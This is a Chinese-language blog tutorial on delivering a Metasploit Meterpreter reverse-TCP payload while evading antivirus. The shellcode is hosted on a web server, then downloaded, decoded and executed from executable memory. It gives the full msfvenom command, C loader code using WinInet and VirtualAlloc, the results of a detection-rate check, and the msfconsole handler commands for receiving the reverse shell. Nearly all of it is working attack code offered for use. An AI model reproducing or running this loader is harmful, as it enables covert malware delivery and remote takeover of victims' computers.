• 通过URL载入ShellCode代码

    将生成的shellcode放到web服务器上,本地不保存恶意代码,本地只负责加载到内存运行,这样可以很好的躲过查杀。

    1. 生成shellcode
    msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c

    2.使用获取代码,前提搭建好http服务器,并将shellcode写入服务器页面中。

    #include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")

char * GetUrlPage(char *URL, char *SubPath)
{
	HINTERNET hInternet, hConnect, hRequest = NULL;
	DWORD dwOpenRequestFlags, dwRet = 0;
	unsigned char *pResponseHeaderIInfo = NULL;
	DWORD dwResponseHeaderIInfoSize = 2048;
	BYTE *pBuf = NULL;
	DWORD dwBufSize = 64 * 2048;

	hInternet = ::InternetOpen("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
	hConnect = ::InternetConnect(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
	if (NULL == hConnect)
		return NULL;

	dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
		INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;

	hRequest = HttpOpenRequest(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
	HttpSendRequest(hRequest, NULL, 0, NULL, 0);

	pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
	RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
	HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
	pBuf = new BYTE[dwBufSize];

	RtlZeroMemory(pBuf, dwBufSize);
	InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
	return (char *)pBuf;
}

int main(int argc, char * argv[])
{
	char *shellcode = GetUrlPage("192.168.1.20", "/shellcode");
	printf("%s \n", shellcode);

	system("pause");
	return 0;
}

    3.处理shellcode代码,并将其加载到堆,并设置可读可执行,执行代码反弹即可。

    	int shellcode_length = strlen(ShellCode);

	unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
	for (size_t count = 0; count < shellcode_length / 2; count++){
		sscanf(ShellCode, "%2hhx", &value[count]);
		ShellCode += 2;
	}

	void *exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, value, shellcode_length /2 );
	((void(*)())exec)();

    测试,查毒率 https://www.virscan.org/ 49个引擎,只有三个报毒。

    第二个 https://www.virustotal.com/ ,查毒率

    3.最后,生成成功后,我们将攻击主机运行一个监听事件,然后打开生成后的后门,然后发现能够成功上线。

    [root@localhost ~]# msfconsole 
msf5 > 
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 8888
msf5 exploit(multi/handler) > exploit -j -z
  • 相关阅读:
    IE的有条件注释
    JavaScript 正则表达式判断是否有小数点
    设置<li>前边圆点样式
    CSS3 Gradient
    z-index
    Linux下weblogic启动报错unable to get file lock的问题
    Linux下启动关闭weblogic
    Java 自动装箱与拆箱(Autoboxing and unboxing)
    jquery怎么跳出当前的each循环
    Integer与int的种种比较你知道多少
  • 原文地址:https://www.cnblogs.com/LyShark/p/13032815.html
Copyright © 2020-2023  润新知